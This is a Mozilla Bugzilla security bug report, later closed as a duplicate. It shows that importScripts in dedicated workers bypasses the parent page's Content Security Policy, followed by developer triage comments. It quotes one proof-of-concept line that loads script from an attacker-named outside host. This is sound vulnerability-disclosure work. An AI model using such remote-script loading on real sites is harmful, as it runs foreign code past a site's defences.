Closed
Bug 1413492
Opened 7 years ago
Closed 2 years ago
importScripts is not governed by CSP set in a dedicated workers parent
Categories
(Core :: DOM: Security, defect, P3)
Core
DOM: Security
Tracking
()
RESOLVED
DUPLICATE
of bug 1320931
People
(Reporter: s.h.h.n.j.k, Unassigned)
References
(Blocks 1 open bug)
Details
(Whiteboard: [domsecurity-backlog2])
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36 Steps to reproduce: 1. Go to https://test.shhnjk.com/csp_external.html 2. Observe the "Message from attacker!" Actual results: importScripts("https://attack.shhnjk.com/worker.js") on worker is not governed by either CSP script-src 'self' nor worker-src 'self'. Expected results: 2.4 of Changes from Level2 (https://w3c.github.io/webappsec-csp/#changes-from-level-2) says "Dedicated workers now always inherit their creator’s policy". Nightly now supports worker-src, so this should be blocked.
|
||
Updated•7 years ago
|
Group: firefox-core-security → core-security
Component: Untriaged → DOM: Security
Product: Firefox → Core
|
|
||
Updated•7 years ago
|
Group: core-security → dom-core-security
|
||
Comment 1•7 years ago
|
||
(In reply to Jun from comment #0) > 2.4 of Changes from Level2 > (https://w3c.github.io/webappsec-csp/#changes-from-level-2) says "Dedicated > workers now always inherit their creator’s policy". Nightly now supports > worker-src, so this should be blocked. FWIW, I dislike this spec change. People want to treat dedicated workers like subresources even though they create their owns globals. Anyway, is there a WPT for this?
|
||
Comment 2•7 years ago
|
||
Not sure we should consider this a security bug -- the spec is changing and every site / browser could be implementing a different level of support.
Flags: needinfo?(ckerschb)
|
||
Comment 3•7 years ago
|
||
(In reply to Daniel Veditz [:dveditz] from comment #2) > Not sure we should consider this a security bug -- the spec is changing and > every site / browser could be implementing a different level of support. Yeah, this doesn't need to be a hidden bug. Whether this is desired behavior or not is debatable in my opinion. Either way, one would have to successfully launch a worker before one could even call importScripts. But I am open for discussions. For the reference, worker-src was implemented within Bug 1302667.
Group: dom-core-security
Flags: needinfo?(ckerschb)
|
|
||
Updated•7 years ago
|
Blocks: csp-w3c-3
Status: UNCONFIRMED → NEW
Ever confirmed: true
Priority: -- → P3
Whiteboard: [domsecurity-backlog2]
|
|
||
Comment 4•7 years ago
|
||
Updating the title to reflect that this depends on CSP inheritence. I believe we do enforce CSP on importScripts() for CSP set directly on the worker script load headers.
Summary: importScripts is not governed by CSP → importScripts is not governed by CSP set in a dedicated workers parent
|
||
Comment 6•2 years ago
|
||
Duping this to the now invalid bug 1320931.
Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•